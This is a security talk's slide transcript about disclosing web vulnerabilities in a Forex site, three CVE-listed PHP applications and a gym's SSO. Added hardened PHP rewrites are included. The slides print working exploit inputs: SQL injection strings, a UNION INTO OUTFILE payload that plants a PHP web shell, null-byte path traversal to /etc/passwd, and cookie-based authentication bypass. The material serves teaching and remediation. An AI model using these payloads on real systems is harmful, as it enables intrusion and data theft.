It’s Vulnerable… Now What?: Three Tales of Woe and Remediation
 

Presentation Transcript

  • It’s Vulnerable… Now What? Three Diverse Tales of Woe and Remediation
    Mark Stanislav <mark.stanislav@gmail.com>
  • De-Facto Quote Slide
    “Thank goodness the working exploit will remain as the ‘gold standard’ for cutting through the BS in the field of data security for the foreseeable future.” - Marsh Ray
    Source: http://seclists.org/fulldisclosure/2011/Jan/397 ; it’s legit
  • The More Hats The Better
    Day Job: Linux systems administrator
    Night Job: Adjunct lecturer at a university
    Boredom: Finding web app vulnerabilities
    Side Note: PHP programmer for ~10 years*
    * Quickly becoming a Ruby fiend
  • PHP Vulnerability Primer
    Inputs That Get Owned:
    $_GET: Query Strings
      index.php?user=mstanislav
    $_POST: Form Submission
      <input type="text" name="user">
    $_COOKIE: Cookies
      Chocolate Chip -- nom nom.
  • PHP Vulnerability Primer, cont.
    Common Attacks:
    Local File Inclusion (LFI)
      Show me your /etc/passwd file
    SQL Injection
      Show me your user table
    Authentication/Authorization Bypass
      Who needs a username or password?
  • Tale #1 - On The Clock
    Scenario: A client hires a PHP developer to create a web site for their financial service company (Forex)
    Problem: Developer has no business writing a ‘Hello, World!’ application, let alone a web application handling credit card data
  • Vulnerabilities Found
    Adjust ‘membership level’ of any account
    Reset account passwords to hardcoded default
    Change any user password to a desired value
    Delete all user accounts
    Retrieve ACH account information
    Retrieve all user account details
    Create an administrative user account
  • Clown Shoes
    “Something or someone that is a total joke”
    Source: Urban Dictionary; it’s legit
  • Code Review, Part #1
    Vulnerable Code
      function updateMembershipLevel() {
        list($level,$email) = GetVars(level,email);
        DB_query("UPDATE users SET membership_level = $level WHERE email = $email");
      }
    Exploit
      foo.php?mod=user&req=updatelevel&level=100&email=user@example.com
    Why The Code Sucks
      • No authentication prior to allowing execution of updateMembershipLevel()
      • There is no audit trail to changes being made through this function
      • The code does not escape or sanitize $_GET variables being passed
  • Code Review, Part #2
    Vulnerable Code
      function updatePassword() {
        list($resetkey,$pass) = PostVars(resetkey,pass1);
        $html = ReadTemplate(password,password_email_form);
        $sql = "UPDATE users SET passwd = md5(".DB_escape_string($pass).") WHERE resetkey=$resetkey";
        DB_query($sql);
        [...]
      }
    Exploit
      <form name="attacker" action="foo.php?mod=password&req=update" method="post">
        <input type="text" name="resetkey" value=" OR resetkey IS NOT NULL OR resetkey=TRUE" />
        <input type="text" name="pass1" value="test" />
      </form>
    Why The Code Sucks
      • Only the password input is escaped properly; the ‘resetkey’ $_POST input is not
      • SQL doesn’t use parameterized statements to protect against general SQL injection
  • Code Review, Part #3
    Vulnerable Code
      function insertUser() {
        if ((is_SuperUser()) && (isset($_SESSION[virtual_client_id]))) {
          $clientID = $_SESSION[virtual_client_id];
        } else {
          $clientID = $_SESSION[client_id];
        }
        list($first,$last,$email,$groupID,$passwd,$addr1,$addr2,$city,$state,$zip) =
          GetVars(first,last,email,group,passwd,addr1,addr2,city,state,zip);
        [...]
      }
    Exploit
      foo.php?mod=adminusers&req=insert&passwd=test&email=a@b.com&group=1
    Why The Code Sucks
      • insertUser() method isn’t restricted from being available to unauthenticated site visitors
      • is_SuperUser() doesn’t affect arbitrary calls to add a user to the database
      • No sanitization or verification is done to any data based on $_GET variables passed
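The three reviewed functions, rewritten along the lines the "Why The Code Sucks" bullets call for. This is an added example, not code from the Forex site or from the talk. It assumes a PDO handle $db, a server-side session that carries the caller's id and role, and the table and column names given in the comments; it also moves the state-changing handlers from $_GET to $_POST, which the original did not do.

```php
<?php
// Added example: hardened rewrites of the three reviewed functions. Not the
// original site's code. Assumed, for illustration: a PDO handle $db, a
// server-side session holding the caller's id and role, and the tables
// users(id, email, membership_level, group_id, passwd, resetkey,
// resetkey_expires) and audit_log(actor_id, action, target, at).
declare(strict_types=1);

// Authorization gate: every state-changing handler calls this first and
// gets back the acting user's id for the audit trail.
function requireRole(string $role): int {
    if (empty($_SESSION['user_id']) || ($_SESSION['role'] ?? '') !== $role) {
        http_response_code(403);
        exit('Forbidden');
    }
    return (int) $_SESSION['user_id'];
}

function audit(PDO $db, int $actorId, string $action, string $target): void {
    $stmt = $db->prepare(
        'INSERT INTO audit_log (actor_id, action, target, at) VALUES (?, ?, ?, NOW())'
    );
    $stmt->execute([$actorId, $action, $target]);
}

// Part #1: admin-only, level range-checked, both values bound, change logged.
// Reads POST rather than GET: state changes do not belong on a query string.
function updateMembershipLevel(PDO $db): void {
    $actor = requireRole('admin');
    $level = filter_input(INPUT_POST, 'level', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 100]]);
    $email = filter_input(INPUT_POST, 'email', FILTER_VALIDATE_EMAIL);
    if (!is_int($level) || !is_string($email)) {
        http_response_code(400);
        exit('Bad request');
    }
    $stmt = $db->prepare('UPDATE users SET membership_level = ? WHERE email = ?');
    $stmt->execute([$level, $email]);
    audit($db, $actor, 'update_level:' . $level, $email);
}

// Part #2: the reset key is bound as data, must still be valid, and is
// consumed on use; the password is stored with password_hash(), not md5().
function updatePassword(PDO $db): void {
    $resetkey = $_POST['resetkey'] ?? '';
    $pass     = $_POST['pass1'] ?? '';
    if (!is_string($resetkey) || !is_string($pass)
        || !preg_match('/\A[A-Fa-f0-9]{64}\z/', $resetkey) || strlen($pass) < 12) {
        http_response_code(400);
        exit('Bad request');
    }
    $stmt = $db->prepare(
        'UPDATE users SET passwd = ?, resetkey = NULL, resetkey_expires = NULL
          WHERE resetkey = ? AND resetkey_expires > NOW()'
    );
    $stmt->execute([password_hash($pass, PASSWORD_DEFAULT), $resetkey]);
    if ($stmt->rowCount() !== 1) {
        http_response_code(400);
        exit('Invalid or expired reset key');
    }
}

// Part #3: creating users is an admin action, and the group comes from an
// allowlist instead of straight from the request.
function insertUser(PDO $db): void {
    $actor = requireRole('admin');
    $allowedGroups = [1 => 'member', 2 => 'staff'];          // assumed group ids
    $groupID = filter_input(INPUT_POST, 'group', FILTER_VALIDATE_INT);
    $email   = filter_input(INPUT_POST, 'email', FILTER_VALIDATE_EMAIL);
    $passwd  = $_POST['passwd'] ?? '';
    if (!is_int($groupID) || !isset($allowedGroups[$groupID])
        || !is_string($email) || !is_string($passwd) || strlen($passwd) < 12) {
        http_response_code(400);
        exit('Bad request');
    }
    $stmt = $db->prepare('INSERT INTO users (email, group_id, passwd) VALUES (?, ?, ?)');
    $stmt->execute([$email, $groupID, password_hash($passwd, PASSWORD_DEFAULT)]);
    audit($db, $actor, 'insert_user:group' . $groupID, $email);
}
```

Each handler answers one bullet from the review: requireRole() is the missing authentication check, the prepared statements replace string-built SQL so the ‘resetkey’ payload from Part #2 is just a 64-character key that matches nothing, and audit() gives the trail Part #1 lacked. A CSRF token on the POST forms is a separate control this example does not cover.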
  • Remediation
    Created an executive summary of the vulnerabilities, their associated impacts, and recommendations to resolve the issues.
    The developer was fired and a new one was hired who fixed the issues; which I verified.
    Fun Fact: The developer who wrote this code uses the same code-base for 30+ sites currently online using the same framework...
  • What’s a CVE?
    Common Vulnerabilities & Exposures
    “A CVE Identifier will give you a standardized identifier for any given vulnerability or exposure.” - MITRE CVE FAQ
    Only for packaged software offerings
    Ideally used in a ‘responsible disclosure’ process
    Keeps issues organized and easy to reference
    Helps to prevent duplication of vulnerabilities
  • How Do I Get a CVE?
    1. Find the vulnerability -- score!
    2. Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.
    3. Contact a CVE Numbering Authority (CNA)
    4. Ideally the vendor cares and fixes the issue
    5. Release your advisory with the CVE included
    6. Provide links of publication back to MITRE
  • Tale #2 - The Community
    Scenario: Random PHP applications you find on SourceForge.net & FreshMeat.net
    Problem: Not everyone releasing free (as in GNU) or paid (as in $$$) software is a good programmer -- surprise!
  • WSN Links SQL Injection
    Vulnerable Code
      Didn’t copy it down, but basically: ‘namecondition’ and ‘namesearch’ $_GET values allow for a SQL injection when unified to bridge existing SQL queries to allow for exploitation
    Exploit
      search.php?namecondition=IS NULL)) UNION ((SELECT "<?php system($_REQUEST[cmd]); ?>" INTO OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categories
    Why The Code Sucks
      • Improper sanitization of $_GET inputs within some functions of search
      • No explicit installation recommendation to prevent FILE privilege
      • Side Note: foo.php?debug=1 turns on debugging in the default installation
  • WSN Links Remediation
    CVE-2010-4006
    Vendor blacklisted ‘UNION’ within search queries as a ‘fix’ to the issue
    New version released 3 days after notification had occurred
    It would be better to actually fix all of the SQL injection bugs (yes, there are more) rather than using a bandage like a UNION blacklist
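A search handler in the shape of the one described above, rebuilt so that the condition and the search term are handled separately and neither can reach the SQL text. This is an added example, not WSN Links code; the table and column names (links.name) and the four supported conditions are assumptions.

```php
<?php
// Added example, not WSN Links code. The 'namecondition' request value
// selects one of the operators below by key; the SQL fragment itself is
// fixed by the developer and never built from request data. The table and
// column (links.name) are assumed for illustration.
declare(strict_types=1);

const NAME_CONDITIONS = [
    'contains'   => 'name LIKE ?',
    'startswith' => 'name LIKE ?',
    'is'         => 'name = ?',
    'isnull'     => 'name IS NULL',
];

// Returns [sql, params]; throws when the condition is not one we support.
function buildSearch(string $condition, string $term): array {
    if (!array_key_exists($condition, NAME_CONDITIONS)) {
        throw new InvalidArgumentException('unknown name condition');
    }
    $sql = 'SELECT id, name FROM links WHERE ' . NAME_CONDITIONS[$condition];
    switch ($condition) {
        case 'contains':
            // Escape LIKE wildcards so % and _ in the user's term match literally.
            $params = ['%' . addcslashes($term, '%_\\') . '%'];
            break;
        case 'startswith':
            $params = [addcslashes($term, '%_\\') . '%'];
            break;
        case 'is':
            $params = [$term];
            break;
        default:                       // 'isnull' takes no parameter
            $params = [];
    }
    return [$sql, $params];
}

function runSearch(PDO $db, string $condition, string $term): array {
    [$sql, $params] = buildSearch($condition, $term);
    $stmt = $db->prepare($sql);      // the term travels as a bound value
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The slide's payload never gets as far as SQL: the condition is rejected
// before a query string exists, so there is nothing for a UNION blacklist to do.
try {
    buildSearch('IS NULL)) UNION ((SELECT 1 INTO OUTFILE', '/var/www/exec.php');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

// A legitimate request with wildcard characters in the term: the % is escaped
// and bound, not spliced into the query.
[$sql, $params] = buildSearch('contains', '100% free');

// Deployment note for the installation guide (MySQL): the INTO OUTFILE step
// of the exploit needs the FILE privilege, which the application's database
// account should not hold, and secure_file_priv on the server limits where
// the server may write at all:
//   REVOKE FILE ON *.* FROM 'app'@'localhost';
```

The allowlist is the fix the slide asks for in place of the vendor's UNION blacklist: the request chooses among fragments the developer wrote, so the search term can contain UNION, quotes or comment markers without consequence. The FILE privilege note addresses the second bullet; removing it turns the same injection, if one remained elsewhere, from code execution back into data disclosure.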
  • Pointter CMS Authentication Bypass
    Vulnerable Code
      On all administrative pages:
      if (!isset($_COOKIE[auser]) or !isset($_COOKIE[apass])) {
        header("location:index.php");
      }
    Exploit
      Simply create ‘auser’ and ‘apass’ cookies. The contents of the cookies don’t impact the exploitation as there is no verification of contents before ‘using’ the cookies as a valid authentication mechanism.
    Why The Code Sucks
      • There’s no reason to store a password cookie in the first place
      • A session cookie should be unique and unpredictable (a random token, not credentials)
      • Blank cookies should never be used as a form of authentication
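What the administrative pages should have done instead of testing whether two cookies exist: authenticate once against a stored hash, then carry only an opaque server-side session id. This is an added example, not Pointter code; the admins table and its columns are assumed for illustration.

```php
<?php
// Added example, not Pointter CMS code. Assumes a PDO handle $db and an
// admins(username, passwd) table whose passwd column holds password_hash()
// output; names are illustrative.
declare(strict_types=1);

// Session cookie flags: HTTPS-only, unreadable from JavaScript, not sent on
// cross-site requests. Array form of session_set_cookie_params() needs PHP 7.3+.
function startSecureSession(): void {
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
    session_start();
}

// Called by the login form handler. The browser never holds the password;
// it only receives a fresh session id after the hash verifies.
function adminLogin(PDO $db, string $user, string $pass): bool {
    $stmt = $db->prepare('SELECT passwd FROM admins WHERE username = ?');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Always run one verification so an unknown username costs the same
    // time as a wrong password.
    $hash = $row !== false ? $row['passwd'] : password_hash('placeholder', PASSWORD_DEFAULT);
    $ok   = password_verify($pass, $hash);
    if ($row === false || !$ok) {
        return false;
    }
    session_regenerate_id(true);            // new id on login: no session fixation
    $_SESSION['admin_user'] = $user;
    $_SESSION['login_time'] = time();
    return true;
}

// Replaces the cookie check at the top of every administrative page. The
// exit matters: the original redirect had none, so the rest of the page
// still executed and its output was sent along with the redirect.
function requireAdmin(): void {
    if (empty($_SESSION['admin_user'])) {
        header('Location: index.php');
        exit;
    }
}

startSecureSession();
requireAdmin();
```

The difference from the original is where the decision lives: the server decides who is logged in from state only it can write, and the cookie's value is a random id that identifies that state without encoding anything about the user. Renaming the admin folder, the vendor's suggestion, changes none of this.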
  • Pointter CMS Remediation
    CVE-2010-4332 & CVE-2010-4333
    Two separate products, same vulnerability
    No updates have been released to fix the issue
    Disclosure to vendor was met with legal threats and very funny dialog (you’ll see...)
    Vendor claims that the user should rename their admin folder to hide, erm... prevent the issue! =)
  • The Swiss
    “Not as docile as you’d expect...”
    Source: Me; it’s legit
  • E-Mail Outtakes!
    “We do not understand why you try to manipulate the softwares. I am sure that you are aware that it is illegal to do so.”
    “...it is not your duty to publish anything related about our softwares as long as we ask for it.”
    “What you are trying to do, is to find a security hole and publish it so that everyone can hack a system. This is the illegal part so be aware of this.”
  • E-Mail Outtakes!, cont.
    “The illegal thing is to publish a security gap to show other people the way how to attack. That is the same as telling someone how to build a bomb.”
    “Of course, it could be made safer and we know how to do it. But we have designed the softwares so that renaming admin folder gives us less work.”
  • Null-Byte Attack Primer
    PHP uses C functions for filesystem calls, which read a null-byte as ‘end of string’
    (PHP 5.3.4 and later reject filesystem paths that contain a null byte, so this applies to older or unpatched installs.)
      include("/var/www/" . $_GET['file'] . ".php");
    index.php?file=../../../etc/passwd
      include("/var/www/../../../etc/passwd.php");
    index.php?file=../../../etc/passwd%00
      include("/var/www/../../../etc/passwd");
  • Pulse CMS Local File Inclusion
    Vulnerable Code
      $page = $_REQUEST[p];
      switch ($page) {
        case $page:
          include("includes/". $page .".php");
          break;
      }
    Exploit
      index.php?p=/../../../../../../../../../../../../../../etc/passwd%00
    Why The Code Sucks
      • This method to prevent LFI is easily defeated with magic_quotes_gpc disabled
      • There’s no sanitization or regex used to prevent LFI attacks
      • Null-byte attacks are a problem with PHP (C-based) and need to be considered
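The page selector from the Pulse CMS slide rewritten so that the request can only pick from a fixed set of files, which also closes the null-byte variant from the primer above. This is an added example, not Pulse CMS code; the page names and the includes/ layout are assumptions.

```php
<?php
// Added example, not Pulse CMS code. Assumes the pages live in includes/
// and that 'home', 'about', 'contact' and 'blog' are the only valid names.
declare(strict_types=1);

const PAGE_DIR = __DIR__ . '/includes';
const PAGES    = ['home', 'about', 'contact', 'blog'];

// Returns the absolute path to include, or null when the request is not a
// page we ship. Three independent checks; any one of them stops the slide's payload.
function resolvePage(string $requested): ?string {
    // 1. Shape: a page name is a short token of [a-z0-9_-]. This rejects
    //    "../", absolute paths and a NUL byte (%00 decoded) before anything
    //    touches the filesystem, so it does not depend on the PHP version's
    //    handling of null bytes in paths.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $requested)) {
        return null;
    }
    // 2. Allowlist: the literal value must be one of ours, not merely well-formed.
    if (!in_array($requested, PAGES, true)) {
        return null;
    }
    // 3. Containment: resolve symlinks and confirm the file sits under PAGE_DIR.
    $path = realpath(PAGE_DIR . '/' . $requested . '.php');
    $base = realpath(PAGE_DIR);
    if ($path === false || $base === false
        || strncmp($path, $base . '/', strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// How the checks treat the inputs from the slides:
//   "about"                  passes all three
//   "../../../etc/passwd"    stopped by check 1 ("/" and "." are not in the class)
//   "../../../etc/passwd\0"  stopped by check 1 (NUL is not in the class either)
//   "blog2"                  passes check 1, stopped by check 2
$page = resolvePage((string) ($_REQUEST['p'] ?? 'home'));
if ($page === null) {
    http_response_code(404);
    exit('No such page');
}
include $page;
```

The original's switch/case is a tautology (case $page always matches $page), so it filtered nothing. The allowlist is the actual control here; the regex and the realpath containment are defence in depth for the day someone extends the list with a value that is not a plain name.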
  • Pulse CMS Remediation
    CVE-2010-4330
    Vendor patched the current version immediately and then released a new version a few days later
    Null-byte attacks are a real problem and programmers need to program with it in mind
    File inclusion from a user-controlled variable should be heavily interrogated (regex/sanitization)
  • Tale #3 - SaaS Gone Wrong
    Scenario: You sign-up for a gym membership
    Problem: Your gym’s online fitness integration web site has broken Single Sign-On causing massive PII/PHI leakage
  • SSO “Bypass”
    Vulnerable Code
      Have no access to company’s site code, but here’s my best guess...
      function checkAuthentication($memberid, $gymid) {
        // Implement this later, kthx!
      }
    Exploit
      http://www.example.com/diff/partners/member_activate.aspx?memberid=[memberid_integer]&gymid=[gymid_integer]
    Why The Code Sucks
      • It didn’t require users to ‘sign-up’ for some of their data to be available
      • Complete SSO implementation failure
      • No one could have possibly tested/QA’ed this code before it was launched
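The activation hand-off as it should work: the gym mints a link the fitness site can verify, so a raw, sequential memberid is never enough to open a profile. This is an added example, not the vendor's code (the talk had no access to it); the token format, the 24-hour window and the shared-key arrangement are assumptions.

```php
<?php
// Added example, not the fitness vendor's code. Assumes the gym (identity
// provider) and the fitness site share a random secret key of 32+ bytes.
// Token format and expiry window are illustrative.
declare(strict_types=1);

const ACTIVATION_TTL = 86400;   // seconds the link stays valid

// Gym side: bind member id, gym id and expiry together under an HMAC.
function makeActivationToken(string $key, int $memberId, int $gymId, int $now): string {
    $expires = $now + ACTIVATION_TTL;
    $payload = "$memberId|$gymId|$expires";
    $mac     = hash_hmac('sha256', $payload, $key);
    return strtr(base64_encode("$payload|$mac"), '+/', '-_');   // URL-safe
}

// Fitness-site side: verify the MAC and expiry before trusting any field.
// Returns [memberId, gymId] or null.
function verifyActivationToken(string $key, string $token, int $now): ?array {
    $raw = base64_decode(strtr($token, '-_', '+/'), true);
    if ($raw === false) {
        return null;
    }
    $parts = explode('|', $raw);
    if (count($parts) !== 4) {
        return null;
    }
    [$memberId, $gymId, $expires, $mac] = $parts;
    if (!ctype_digit($memberId) || !ctype_digit($gymId) || !ctype_digit($expires)) {
        return null;
    }
    $expected = hash_hmac('sha256', "$memberId|$gymId|$expires", $key);
    if (!hash_equals($expected, $mac)) {       // constant-time comparison
        return null;
    }
    if ((int) $expires < $now) {
        return null;
    }
    return [(int) $memberId, (int) $gymId];
}

// Demonstration with a constructed key and clock; a real key comes from
// configuration, never from source.
$key   = 'constructed-demo-key-replace-with-random-bytes';
$now   = 1700000000;
$token = makeActivationToken($key, 12345, 42, $now);

var_dump(verifyActivationToken($key, $token, $now));                      // genuine, in window
var_dump(verifyActivationToken($key, $token, $now + ACTIVATION_TTL + 1)); // same token, expired

// Bumping the member id, which is all the enumeration scripts did, leaves the
// MAC covering the old id, so the tampered token is rejected.
$tampered = base64_decode(strtr($token, '-_', '+/'), true);
$tampered = str_replace('12345|', '12346|', $tampered);
$forged   = strtr(base64_encode($tampered), '+/', '-_');
var_dump(verifyActivationToken($key, $forged, $now));
```

Including gymid under the MAC also stops a member of one gym from activating under another gym's id, and hash_equals() keeps the comparison from leaking the MAC through timing. With this in place, "is memberid 12346 a real account" can no longer be asked of the activation endpoint at all, which is what the two verification scripts on the next slide exploited.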
  • Vulnerability Verification
    Script #1: Out of 10,000 sequential memberid values roughly 2,700 accounts existed in either an activated or unactivated state.
    Script #2: Of the 1,000 memberid values checked, 76 accounts were activated. One user profile had a picture, eight users had listed phone numbers, and at least one user had a medical questionnaire filled-out.
  • Information Being Disclosed
    Unactivated Account: First Name, Last Name, Date of Birth, Gender, and E-Mail Address
    Activated Account: Photo, First Name, Last Name, Date of Birth, Gender, E-Mail Address, Phone Number, Height, Weight, Body Fat %, Timezone, Gym Membership Company, Workout Schedule, and Medical History (blood pressure issues, heart problems, recent surgery, pregnancy, diabetes, etc.)
  • Remediation
    Contacted CEO (small company) with a report
    Lots of follow-up e-mails with increasing amounts of people (read: lawyers/execs) added
    Consistently reaffirmed my commitment to help and deflected any comments towards me being some kind of nefarious hacker
    Took three weeks after successful contact to have the issue actually fixed...
  • Customers Notified
    90,000+
  • But be careful...
    It’s a very thin line between committing a crime and just trying to help a web site with a problem
    Don’t make threats, don’t ‘force their hand’; be respectful, professional, and continuously affirm your desire to protect people and information
    Anyone can be sued at anytime for anything in our country -- it doesn’t mean you’re guilty, but you can certainly lose time and money this way
    Let your ethics and common sense lead you...
  • Generalized Take-Aways
    Do the right thing, consistently, and people won’t have much room to actually threaten you
    Full-disclosure to the community helps to keep developers and businesses accountable for the products and services they offer
    Responsible disclosure allows you to make more friends than enemies; most people are really appreciative of your assistance
    Vulnerability research is tediously fun! ;)
  • My Thoughts...
    Info Sec. is everyone’s responsibility
    Don’t accept an answer of “well, we didn’t build this with security in mind...”
    Ethics and information security are not, in my mind, allowed to be separated
    This isn’t about 1337 ‘sploits. It’s about protecting your business, your friends, your family, and yourself from unethical people
  • Thanks...
    Jon Oberheide - Duo Security
    Steve Christey - MITRE
    Todd Jarvis - Packet Storm Security
  • Contact
    E-Mail: mark.stanislav@gmail.com
    Twitter: @markstanislav
    Website: http://www.uncompiled.com